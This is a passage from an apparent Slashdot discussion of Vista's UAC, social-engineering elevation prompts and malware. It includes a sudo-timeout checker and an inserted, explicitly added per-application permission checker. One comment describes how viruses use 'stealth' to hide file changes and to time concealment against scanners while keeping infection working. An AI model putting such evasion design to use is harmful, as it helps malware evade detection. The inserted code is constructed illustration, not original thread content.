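    return found.get(":" + user, found.get(""))


def describe(minutes):
    """Human-readable verdict for one timeout value."""
    if minutes is None:
        return "unset: credentials cached for sudo's default window"
    if minutes == 0:
        return "0: password required for every sudo/gksudo invocation"
    if minutes < 0:
        return "negative: cached credentials never expire"
    return f"{minutes:g}: credentials cached for {minutes:g} minute(s)"


if __name__ == "__main__":
    for name, text in (("caching", SUDOERS_CACHING), ("hardened", SUDOERS_HARDENED)):
        for user in ("alice", "bob"):
            print(f"{name:9} {user:6} {describe(effective_timeout(text, user))}")
```

Edit the real file with `visudo`, not directly; and `sudo -K` discards an already cached timestamp immediately, which is the quick way to close the window after an elevated command without waiting for it to expire.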

Re: An Expected Approach (1)

Durandal64 (658649) | more than 7 years ago | (#18848395)

What is the method, exactly? How does putting up a fake elevation prompt accomplish anything? If it's a fake elevation prompt, by definition, it accomplishes nothing. To get elevated privileges, you have to go through UAC, and the actual elevation interface exists on a separate desktop to prevent scripts from faking a click on the "Allow" button. So how is this "attack" any different from just presenting a random button to the user that says "CLICK ME OMG PLEEEZE CLICK ME!!!"?

Re: An Expected Approach (1)

NatasRevol (731260) | more than 7 years ago | (#18848451)

The question is: can the script bring up the real UAC interface, and since the user is so used to just clicking Accept to get things to work, is the rootkit thus installed by the user?

Re: An Expected Approach (2, Insightful)

funkyloki (648436) | more than 7 years ago | (#18849101)

The gift is that Microsoft can now "blame" the user for their weakly written OS. By making it the user's responsibility to approve/disapprove just about every freakin' thing that runs on the Vista box, they can then go back and say "Gee, too bad you got that virus/spyware/malware infection, but it's not our fault, you clicked Allow".

Instead of making a better, more secure OS, they just shifted the culpability for weak security to the user.

Really? (1)

adona1 (1078711) | more than 7 years ago | (#18848129)

I was amazed to find out that a Windows OS will probably get malware.

That's it for today. Time to go to my home under a log. Where I've been living for the last two decades :)

Re:Really? (1)

alshithead (981606) | more than 7 years ago | (#18849451)

"That's it for today. Time to go to my home under a log. Where I've been living for the last two decades :)"

Dude...you are so way behind teh times...Shouldn't you like be living under a ROCK! Living under a log has been out of date for like evar...

Re:Really? (1)

adona1 (1078711) | more than 7 years ago | (#18849869)

I'm an environmentalist, I'll only live under biodegradable objects ;)

Why is this news? (1)

grapeape (137008) | more than 7 years ago | (#18848133)

Seriously, this is like one of those headlines where researchers find that depressed people are more likely to commit suicide or that water is wet. As long as there are stupid users there will be exploited computers, and as long as Microsoft has the lion's share of the market there will be more zombied Windows boxes.

I had a bit of a disagreement with a client today over spam on her computer. She freaks out if there is more than one in her inbox. Every time I am at her machine she has Webshots or Smiley Central or whatever the "cool" spyware-infested freebie of the week happens to be. She claims that she should be able to download what she wants but that I should be able to keep her system clean in spite of it. It's a no-win situation; as long as she chooses to be stupid I'm stuck getting the blame for her problems.

Ingris Featherstrom (0)

photomonkey (987563) | more than 7 years ago | (#18848139)

Download 1000+ free smiley icons for AOL, ICQ and Windows Messenger by clicking on this link [goatse.cx] and also by sending me your name, Social Security number, address, and a pair of your wife's panties (but only if she's hot).

Also, we have v1@grA and C1ALIS sof-tabs and gelcaps!!!11!!!11!

Please install bugfix-324234.exe (0)

Anonymous Coward | more than 7 years ago | (#18848231)

Even the best operating system will not stop the worst user from installing something on their system intentionally if they have some type of "official" word from someone. I've seen thousands of these "Please install this bugfix-xxxxx.exe" emails hitting my mail server and I've seen how convincing they look, with the Microsoft logo and apparently correct email contact information and an almost perfect Microsoft font. Most of my shop is Macs so I don't really have to worry about this, but I still sent out an email message about not installing anything from email or the web unless you have initiated contact with the vendor.

Vista doesn't stop these intentional installs of malware; the user will "okay" everything to bypass the security, and the malware installs.

but but.... (1, Insightful)

Anonymous Coward | more than 7 years ago | (#18848275)

but...but.....

vista is supposed to be completely secure.......

feelings of betrayal over buying a whole new PC to run this POS OS are setting in. Allow or deny?

Unix-style permissions are not enough. (5, Interesting)

earthbound kid (859282) | more than 7 years ago | (#18848289)

People sometimes talk like strong enforcement of Unix-style permissions is sufficient to provide local security. I find that argument totally unconvincing. Yes, it's nice to have the confidence that with modern OSes like Linux, OS X, and (probably) Vista I won't end up like the old Windows where you have to reformat a disk to try to clear the deeply dug in roots of some spyware crap from the system, but there's still the pretty damn big issue of all my data. Namely, having to reinstall the OS would be a pain, and I'm glad I don't have to waste an hour doing it, but losing all my data (documents, photos, music, and to a lesser extent application preferences) would be devastating. The data on my PowerBook is my life, and the reassurance that at least I don't have to reinstall OS X would be cold comfort at best. True, I do make a monthly backup onto an external drive that is normally unplugged (and thus out of range of rm *ing attacks), but probably most users don't follow this practice. Besides, a subtler virus could just silently corrupt my data over a period of months, so that I don't notice what's going on until my backups are no longer any good!

There is a solution to the problem, but it requires a deep-rooted change in how things are done. What I propose is that we shift from permissions by user to permissions by application. Right now, any app that my user launches can erase any of my files. That's ridiculous! Much more logical would be allowing me to decide which subset of my files each app can use and how. So, for example, I would let Firefox write downloads to my desktop and its preferences and caches to subfolders of the Library, but I wouldn't want it to be able to erase any of my other files under any circumstances. In fact, most of the time I don't even want Firefox to be able to read my local files, but I'd be willing to put in a password to let it do so on a time-limited basis during uploads and the like.

Basically, what I'm proposing amounts to sandboxing every app. This may seem harsh, but why not do it? What's the advantage of letting any app destroy any of my files? Make them at least beg me for permission first, I say!

So, that's what's on my wishlist for the future of OS level security.

Re:Unix-style permissions are not enough. (1)

DaleGlass (1068434) | more than 7 years ago | (#18848417)

One word: SELinux

It's not new either. And it does what you want it to do. However, it's a royal pain in the ass to configure, because you need to figure out what every application should be able to do. It's definitely not something for a newbie, and probably it will be long before such a thing is usable by normal people.

Also, I doubt it'll work well for Windows. For Linux sure, distributions would just have to provide the SELinux security settings for the packages. But for Windows? Who provides the list of things the application should be able to do? It can't be the author, as all the malware would just ship rules allowing them to mess with whatever they need.
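As an added illustration of the per-application permissions earthbound kid proposes above, and of the kind of rule an SELinux policy expresses for real as DaleGlass notes, here is a small Python policy checker. It is not SELinux and not code from the thread or its posters: each application gets a list of directories and the operations it may perform there, everything else is denied by default, paths are canonicalised so `..` cannot escape a granted directory, and a password-gated time-limited grant can open an extra directory for a single task. The application names, directories and operations are assumptions made up for the example.

```python
import posixpath

# Constructed per-application policy (an assumption for the example): an app may touch
# only the directories listed for it, and only with the listed operations.
POLICY = {
    "firefox": [
        ("/home/alice/Desktop", {"read", "write", "create"}),
        ("/home/alice/Library/Firefox", {"read", "write", "create", "delete"}),
    ],
    "textedit": [
        ("/home/alice/Documents", {"read", "write", "create", "delete"}),
    ],
}

# Time-limited grants a user would approve interactively (e.g. after a password prompt)
# to let the browser read the photo folder for one upload:
# (app, directory) -> (operations, expiry time in seconds).
TEMP_GRANTS = {}

# Denied requests are recorded so the user or admin can review what an app tried to do.
DENIED_LOG = []


def canonical(path):
    """Normalise a path so '..' and repeated slashes cannot escape a granted directory."""
    p = posixpath.normpath(path)
    return "/" + p.lstrip("/") if p.startswith("//") else p


def inside(path, directory):
    """True when `path` is `directory` itself or lies below it.
    The trailing slash stops prefix tricks such as /home/alice/Desktop2."""
    d = canonical(directory)
    return path == d or path.startswith(d.rstrip("/") + "/")


def grant_temporary(app, directory, ops, seconds, now):
    """Record a grant that expires `seconds` after `now`."""
    TEMP_GRANTS[(app, canonical(directory))] = (set(ops), now + seconds)


def check(app, op, path, now=0.0):
    """Decide whether `app` may perform `op` on `path`. Default deny; denials are logged."""
    if not path.startswith("/"):
        DENIED_LOG.append((app, op, path, "relative path"))
        return False
    p = canonical(path)
    # 1. Standing policy for this application.
    for directory, ops in POLICY.get(app, []):
        if inside(p, directory) and op in ops:
            return True
    # 2. Time-limited grants; expired ones are purged as they are encountered.
    for key, (ops, expiry) in list(TEMP_GRANTS.items()):
        if expiry <= now:
            del TEMP_GRANTS[key]
            continue
        g_app, g_dir = key
        if g_app == app and inside(p, g_dir) and op in ops:
            return True
    DENIED_LOG.append((app, op, p, "no matching rule"))
    return False


if __name__ == "__main__":
    print(check("firefox", "write", "/home/alice/Desktop/download.zip"))    # True
    print(check("firefox", "read", "/home/alice/Desktop/../.ssh/id_rsa"))   # False
    print(check("firefox", "delete", "/home/alice/Documents/thesis.doc"))   # False
    grant_temporary("firefox", "/home/alice/Photos", ["read"], 60, now=100)
    print(check("firefox", "read", "/home/alice/Photos/cat.jpg", now=120))  # True
    print(check("firefox", "read", "/home/alice/Photos/cat.jpg", now=200))  # False
    for entry in DENIED_LOG:
        print("denied:", entry)
```

The part that a real system has to get right, and that makes SELinux hard to configure as DaleGlass says, is the policy table itself: every path an application legitimately needs must be listed, or the user gets a prompt or a failure, and the denial log is where those gaps show up.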

Re:Unix-style permissions are not enough. (0)

Anonymous Coward | more than 7 years ago | (#18848467)

sounds kind of like what is called "capability based" program security http://www.skyhunter.com/marcs/capabilityIntro/index.html [skyhunter.com]

Re:Unix-style permissions are not enough. (0)

Anonymous Coward | more than 7 years ago | (#18848513)

Look up the OLPC Project ;)

chroot?. (1)

kybred (795293) | more than 7 years ago | (#18848657)

Basically, what I'm proposing amounts to sandboxing every app. This may seem harsh, but why not do it? What's the advantage of letting any app destroy any of my files? Make them at least beg me for permission first, I say!

Could you set up any app that you wanted to protect your files from with a 'chroot' wrapper? Not really sure if that would work, just asking.

Re:Unix-style permissions are not enough. (1)

TheVoice900 (467327) | more than 7 years ago | (#18848885)

Malware writers are not interested in corrupting your data, what do they have to gain from that? Maybe a small minority who just want to mess with people would actually bother. Real malware is created with the intent of taking over your machine silently and then using it as a zombie to distribute spam, that's where the money is after all.

Why You're Wrong (2, Insightful)

DeadManCoding (961283) | more than 7 years ago | (#18849187)

Let's put this simply. You're right, permissions by user isn't enough. But if we set permissions by app, eventually Windows users will become accustomed to clicking "Accept" to every app permission prompt that occurs, creating the same state we're in now. Do I read all of the XP pop-ups? Yes, I do, as well as all my Spybot pop-ups, as I don't want a random BHO installed on my system. Does everyone read those pop-ups? Hell no!!! And that's the reason why I have to clean out my girlfriend's computer on a monthly basis. I can't expect her and her children to read every pop-up and understand what's going on. As any sysadmin knows, it comes down to the average user. We can try to educate them as much as possible, but until they do learn, we have to have some permissions-based system so that we can try to keep average users out of their computer enough to stop zombied boxen from happening everywhere. Am I trying to educate my girlfriend? Yes, but it's not a simple process.

Expect ??!?!!? (1)

unity100 (970058) | more than 7 years ago | (#18848325)

Rather make it "look forward to".

see, you can't cram in a crapload of control mechanisms (DRM and other shit) that can affect operation of the entire computer (and permission-wise, at even the hardware level too!) and then expect it to be only as vulnerable as previous OSes (or any OS, in fact) that did not contain that much shit in them.

malware producers and virus makers are going to exploit the hell out of the mechanisms Microsoft put in Vista.

User Mode Rootkits? (5, Insightful)

WiseWeasel (92224) | more than 7 years ago | (#18848343)

From the summary:
"malware... can still hide with user-mode rootkits"

Did that strike anyone else as odd? User mode rootkits... wouldn't that be "userkits", or just trojans/viruses/malware? If it doesn't have root access, I don't think you can call it a rootkit.

Re:User Mode Rootkits? (1)

SLi (132609) | more than 7 years ago | (#18848411)

You are right. They should call it something else if it doesn't compromise the entire system. That makes it a relatively isolated incident securitywise (not that it wouldn't be serious if they have compromised all your passwords, which I hope are different from your administrator password, bank account logins and credit card numbers).

Re:User Mode Rootkits? (1)

Megane (129182) | more than 7 years ago | (#18848607)

That makes it a relatively isolated incident securitywise (not that it wouldn't be serious if they have compromised all your passwords, which I hope are different from your administrator password, bank account logins and credit card numbers).

The hell with that, all most of them want to do is use your box as a zombie spam/DoS mule. You don't need root (or its Windows equivalent) to do that.

Re:User Mode Rootkits? (1)

QuantumG (50515) | more than 7 years ago | (#18848459)

"rootkit" is often, stupidly, used as a term for what the old school virus writers call "stealth".. intercepting api calls and falsifying the result to hide something.

they usually only do directory stealth.. the most trivial form..

although I suppose there have been a few rootkits that did full stealth.. actually hiding modifications that have been made to a file.

Full stealth comes in two forms:

* remove info to be hidden on open / replace info to be hidden on close; or
* direct updates of the buffers returned from each read.

Obviously "redirection stealth", as the second form is called, is only good for files that are opened read only. It also happens to be the more efficient, and more difficult to get right form. As such, most viruses tend to only do the first.

The hardest part about using stealth in a virus is to decide when it should be turned on and when it should be turned off. Ideally, you only want to turn it off when the user is performing an operation that is part of an infection vector. For example, when they are putting exes into an archive you definitely don't want stealth active.. otherwise the virus won't get copied into the archive. But when they're running their virus scanner, you definitely want stealth to be active.

Of course, none of this is relevant to "root kits" .. the stealth is always active, unless you know how to manually turn it off.

Social engineering (1)

Matt Perry (793115) | more than 7 years ago | (#18848379)

He demonstrated a social engineering attack scenario where a fake elevation prompt can be used to trick users into clicking "allow" to give elevated rights to a malicious file.'

Your computer is broadcasting an IP address! Click here to download the fix!

Re:Social engineering (1)

vertigoCiel (1070374) | more than 7 years ago | (#18848533)

Pssssh. Just try to hack me. My IP address is 127.0.0.1.

Shock horror! (-1, Troll)

Anonymous Coward | more than 7 years ago | (#18848435)

Pardon me but aren't social engineering attacks independent of software or hardware? I don't see how that relates in any way to Vista, or any other operating system for that matter.

pfffft.. (5, Funny)

Jose (15075) | more than 7 years ago | (#18848437)

malware tends to only be available for popular OS's! I am sure that Vista will remain safe from such attacks.

So, why weren't they saying this BEFORE release? (5, Insightful)

dpbsmith (263124) | more than 7 years ago | (#18848535)

Funny how it's all happy-talk before release, and it's only afterwards that they start to "lower expectations."

Remind me again, what was supposed to be so good about Vista? Oh, yeah, all the stuff like WinFS that somehow never happened.

And when people pointed that out, the answer was "but the really important thing is security, which Vista does have."

The real role of WinFS (1)

EmbeddedJanitor (597831) | more than 7 years ago | (#18848699)

WinFS and precursors have been promised in all versions of Windows since the early 1990s (except probably ME). It seems that WinFS has two main functions:

A) A teaser. A compelling "new age in computing" to get some hype going.

B) A feature to cut when projects run late.

Likely, WinFS will make 20 years old without ever shipping.

Re:The real role of WinFS (2, Funny)

inviolet (797804) | more than 7 years ago | (#18849041)

WinFS and precursors have been promised in all versions of Windows since the early 1990s (except probably ME). [...]

I'm guessing that Duke Nukem Forever is dependent on some unique feature of the WinFS filesystem...

But the website said to answer yes (5, Informative)

noidentity (188756) | more than 7 years ago | (#18848595)

I was trying to print some online coupons recently and special software had to be installed. On the installation instructions, it said to run the installer, then answer "yes" to the question it asked (obviously whether it should be allowed to modify system files). What's the use of OS security if users regularly install software which requires admin access? (due to some kind of Digital Restrictions Management scheme, of course)

Re:But the website said to answer yes (0)

Anonymous Coward | more than 7 years ago | (#18849795)

What kind of software is needed to print coupons?

I know you are using this as an example, but it sounds like something that you have actually done. Is this in reference to some "special" coupons that can only be printed by certain people, so in effect is a DRM sort of thing, which I am assuming from your mention of DRM.

I'm trying to think of a reason for special software to print coupons on a standard printer (Not a label type printer). I'm trying to think of a person who has successfully printed a few documents before, who would see a need for special software.

If this is a true example, can you give the name of this coupon vendor, as this kind of practice needs to stop. Make their practices public and let's see what happens to them.

In other news... (1)

renegadesx (977007) | more than 7 years ago | (#18848639)

Water is clear! What a shock, I didn't see that one coming!

malware controlling apps (1)

zobier (585066) | more than 7 years ago | (#18848821)

Um, if malware can control what apps can do/run then why can't anti-malware or in fact the system itself control what the malware can do/run? In So...

Just a dare, or a double-dog dare? (2, Informative)

bl8n8r (649187) | more than 7 years ago | (#18848925)

And, how would that be pronounced in Russian? Where Vista infects you.. er, I mean where you infect Vista.. er..
http://blogs.zdnet.com/Apple/?p=422 [zdnet.com]

I'm puzzled. (1)

Tibor the Hun (143056) | more than 7 years ago | (#18849449)

How can just clicking on "Allow" escalate privileges? Wouldn't you need to enter a password of some sort to prove that you do have admin permissions?

Meh (0)

Anonymous Coward | more than 7 years ago | (#18849855)

a fake elevation prompt can be used to trick users into clicking "allow" to give elevated rights to a malicious file.'

That's completely unnecessary. I tested Vista for an hour last week, and after the fourth prompt (fifteen minutes in), I was already clicking allow blindly. Sure, if it was my real system I'd have been more careful, but your average user wouldn't be.